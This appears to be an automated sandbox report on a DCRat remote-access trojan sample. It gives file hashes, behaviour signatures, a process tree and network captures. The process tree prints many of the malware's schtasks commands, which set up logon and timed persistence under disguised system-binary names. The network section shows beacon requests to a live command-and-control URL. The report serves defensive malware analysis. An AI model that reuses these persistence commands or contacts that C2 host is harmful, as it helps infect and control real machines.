Analysis

  • max time kernel
    22s
  • max time network
    25s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22/03/2025, 19:52 UTC

General

  • Target

    c45000d07293154a655ba52ffb7bab99.exe

  • Size

    849KB

  • MD5

    c45000d07293154a655ba52ffb7bab99

  • SHA1

    4b4fbc2c00cf6c6c6fcea58074213c4f0606b80a

  • SHA256

    f639fc426671cba387b08b8c14743bccfd9d13866982573a1ed2e150967c17ac

  • SHA512

    2805351e0080a62061efb9bc7e3d953221df1180edfcf1142b59302a0afbcf3332a8855deaa9f147ebb11789a3cdbadf6073306000d03698537813bf579df674

  • SSDEEP

    12288:I6NE5ig5Fttrh5PxjUm5SvDdLILaBFkjKuAMx6A5gtbGk84Ca04jtiPBgGKYTx:I6N297PxbsKtC5AHgk

Score
10/10

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Process spawned unexpected child process 33 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 5 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Executes dropped EXE 1 IoCs
  • Drops file in Program Files directory 25 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 33 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\c45000d07293154a655ba52ffb7bab99.exe
    "C:\Users\Admin\AppData\Local\Temp\c45000d07293154a655ba52ffb7bab99.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2532
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\BP5ZSgoJ71.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2300
      • C:\Windows\system32\w32tm.exe
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        3⤵
          PID:1800
        • C:\Windows\Web\Wallpaper\OSPPSVC.exe
          "C:\Windows\Web\Wallpaper\OSPPSVC.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2800
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "lsml" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\lsm.exe'" /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2780
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\lsm.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2900
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "lsml" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\lsm.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2976
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Photo Viewer\lsm.exe'" /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2756
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\lsm.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2912
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Photo Viewer\lsm.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1808
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 6 /tr "'C:\Windows\Web\Wallpaper\OSPPSVC.exe'" /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1860
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Windows\Web\Wallpaper\OSPPSVC.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2796
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 5 /tr "'C:\Windows\Web\Wallpaper\OSPPSVC.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2620
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Google\CrashReports\explorer.exe'" /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2680
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\CrashReports\explorer.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2340
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Google\CrashReports\explorer.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1880
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Reference Assemblies\Microsoft\System.exe'" /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1472
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\System.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2952
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Program Files\Reference Assemblies\Microsoft\System.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1828
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\csrss.exe'" /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:3036
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\csrss.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2832
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\csrss.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2856
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\sppsvc.exe'" /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:3060
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\MSOCache\All Users\sppsvc.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1660
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\sppsvc.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2860
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows NT\Accessories\it-IT\audiodg.exe'" /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:3052
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\it-IT\audiodg.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:3056
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows NT\Accessories\it-IT\audiodg.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2020
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Recent\wininit.exe'" /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1748
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Admin\Recent\wininit.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1752
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Recent\wininit.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:572
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\services.exe'" /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2328
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\MSOCache\All Users\services.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2204
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\services.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2568
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\System.exe'" /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2324
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\System.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:836
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\System.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2604

    Network

    • flag-us
      DNS
      a0728298.xsph.ru
      OSPPSVC.exe
      Remote address:
      8.8.8.8:53
      Request
      a0728298.xsph.ru
      IN A
      Response
      a0728298.xsph.ru
      IN A
      141.8.197.42
    • flag-ru
      GET
      http://a0728298.xsph.ru/tobase.php?QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE&6761200d83ef06c9e2de2b0369613527=df37ef6ee3e07280dee302dbf0daffbc&bb1db653a682b528e4045fb2a995c135=AO4YGNxQ2NyITMjBTO5gDNjFWO0MWOzETNjFWO5AjN2IDM2EGOyUTZ&QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE
      OSPPSVC.exe
      Remote address:
      141.8.197.42:80
      Request
      GET /tobase.php?QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE&6761200d83ef06c9e2de2b0369613527=df37ef6ee3e07280dee302dbf0daffbc&bb1db653a682b528e4045fb2a995c135=AO4YGNxQ2NyITMjBTO5gDNjFWO0MWOzETNjFWO5AjN2IDM2EGOyUTZ&QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE HTTP/1.1
      Accept: */*
      Content-Type: application/json
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
      Host: a0728298.xsph.ru
      Connection: Keep-Alive
      Response
      HTTP/1.1 400 Bad Request
      Server: openresty
      Date: Sat, 22 Mar 2025 19:53:47 GMT
      Content-Type: text/html
      Content-Length: 556
      Connection: close
    • flag-ru
      GET
      http://a0728298.xsph.ru/tobase.php?QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE&6761200d83ef06c9e2de2b0369613527=df37ef6ee3e07280dee302dbf0daffbc&bb1db653a682b528e4045fb2a995c135=AO4YGNxQ2NyITMjBTO5gDNjFWO0MWOzETNjFWO5AjN2IDM2EGOyUTZ&QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE
      OSPPSVC.exe
      Remote address:
      141.8.197.42:80
      Request
      GET /tobase.php?QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE&6761200d83ef06c9e2de2b0369613527=df37ef6ee3e07280dee302dbf0daffbc&bb1db653a682b528e4045fb2a995c135=AO4YGNxQ2NyITMjBTO5gDNjFWO0MWOzETNjFWO5AjN2IDM2EGOyUTZ&QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE HTTP/1.1
      Accept: */*
      Content-Type: application/json
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
      Host: a0728298.xsph.ru
      Response
      HTTP/1.1 400 Bad Request
      Server: openresty
      Date: Sat, 22 Mar 2025 19:53:47 GMT
      Content-Type: text/html
      Content-Length: 556
      Connection: close
    • 141.8.197.42:80
      http://a0728298.xsph.ru/tobase.php?QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE&6761200d83ef06c9e2de2b0369613527=df37ef6ee3e07280dee302dbf0daffbc&bb1db653a682b528e4045fb2a995c135=AO4YGNxQ2NyITMjBTO5gDNjFWO0MWOzETNjFWO5AjN2IDM2EGOyUTZ&QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE
      http
      OSPPSVC.exe
      744 B
      917 B
      5
      5

      HTTP Request

      GET http://a0728298.xsph.ru/tobase.php?QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE&6761200d83ef06c9e2de2b0369613527=df37ef6ee3e07280dee302dbf0daffbc&bb1db653a682b528e4045fb2a995c135=AO4YGNxQ2NyITMjBTO5gDNjFWO0MWOzETNjFWO5AjN2IDM2EGOyUTZ&QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE

      HTTP Response

      400
    • 141.8.197.42:80
      http://a0728298.xsph.ru/tobase.php?QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE&6761200d83ef06c9e2de2b0369613527=df37ef6ee3e07280dee302dbf0daffbc&bb1db653a682b528e4045fb2a995c135=AO4YGNxQ2NyITMjBTO5gDNjFWO0MWOzETNjFWO5AjN2IDM2EGOyUTZ&QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE
      http
      OSPPSVC.exe
      720 B
      917 B
      5
      5

      HTTP Request

      GET http://a0728298.xsph.ru/tobase.php?QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE&6761200d83ef06c9e2de2b0369613527=df37ef6ee3e07280dee302dbf0daffbc&bb1db653a682b528e4045fb2a995c135=AO4YGNxQ2NyITMjBTO5gDNjFWO0MWOzETNjFWO5AjN2IDM2EGOyUTZ&QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE

      HTTP Response

      400
    • 8.8.8.8:53
      a0728298.xsph.ru
      dns
      OSPPSVC.exe
      62 B
      78 B
      1
      1

      DNS Request

      a0728298.xsph.ru

      DNS Response

      141.8.197.42

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Program Files (x86)\Google\CrashReports\explorer.exe

      Filesize

      849KB

      MD5

      3ca656973c558fa4c416836f10bc31d1

      SHA1

      2e6e2e2e26d3a6c2c44c5185767847d022287b47

      SHA256

      58db76fc7a00fb1db766d4fbe5dda6457878b807757f2791f18707c50cb57905

      SHA512

      82d9518fed6d9cf1e5e78efeaf1f9de40870f5f654c1fb81f1b92c68cea9b93ce1d52eda7713e966cbfce0b99e5b587a99b55996a0f68bab020bebb43465d112

    • C:\Program Files\Reference Assemblies\Microsoft\System.exe

      Filesize

      849KB

      MD5

      c45000d07293154a655ba52ffb7bab99

      SHA1

      4b4fbc2c00cf6c6c6fcea58074213c4f0606b80a

      SHA256

      f639fc426671cba387b08b8c14743bccfd9d13866982573a1ed2e150967c17ac

      SHA512

      2805351e0080a62061efb9bc7e3d953221df1180edfcf1142b59302a0afbcf3332a8855deaa9f147ebb11789a3cdbadf6073306000d03698537813bf579df674

    • C:\Program Files\Reference Assemblies\Microsoft\System.exe

      Filesize

      849KB

      MD5

      e0f80964abfaf7e69387c2ab2fe2af79

      SHA1

      2f6a73f00885cb34fe013b99231f6d0a87d58b27

      SHA256

      37f4e5c6d7c399cbeaf132faa2d55a8cc3606db609b283db7f1b4a30530c92f9

      SHA512

      f06ccadfd00ea7003bca0c7e359f623b35fed21a19e744f2d04da27e650920eb9d344a0f488a8abeed64a6f293ed500b6632c59c3340cdadf117fccae820d57c

    • C:\Users\Admin\AppData\Local\Temp\BP5ZSgoJ71.bat

      Filesize

      201B

      MD5

      c2fd7983e12c2da000a31ddaf9594969

      SHA1

      cf029e082db6d03f56934faa31d93ee326f79e2a

      SHA256

      fa83a95a199133f63faf6de1013264e6fc215a65a0476f23458e463d823481b6

      SHA512

      834296179bcac70d89ae2deb3c37d4992622fefb13a5c322ccae47fd643c40fe2e76442f7ea61ba5fd216cb731ed4e4fb939c4219fceb207a77d485d9a2a2c25

    • memory/2532-3-0x00000000006E0000-0x00000000006FC000-memory.dmp

      Filesize

      112KB

    • memory/2532-5-0x0000000000920000-0x0000000000936000-memory.dmp

      Filesize

      88KB

    • memory/2532-6-0x0000000000700000-0x0000000000708000-memory.dmp

      Filesize

      32KB

    • memory/2532-7-0x0000000000950000-0x0000000000960000-memory.dmp

      Filesize

      64KB

    • memory/2532-8-0x0000000000940000-0x000000000094C000-memory.dmp

      Filesize

      48KB

    • memory/2532-4-0x0000000000250000-0x0000000000260000-memory.dmp

      Filesize

      64KB

    • memory/2532-0-0x000007FEF5413000-0x000007FEF5414000-memory.dmp

      Filesize

      4KB

    • memory/2532-2-0x000007FEF5410000-0x000007FEF5DFC000-memory.dmp

      Filesize

      9.9MB

    • memory/2532-168-0x000007FEF5410000-0x000007FEF5DFC000-memory.dmp

      Filesize

      9.9MB

    • memory/2532-1-0x00000000002A0000-0x000000000037A000-memory.dmp

      Filesize

      872KB

    • memory/2800-172-0x0000000000890000-0x000000000096A000-memory.dmp

      Filesize

      872KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.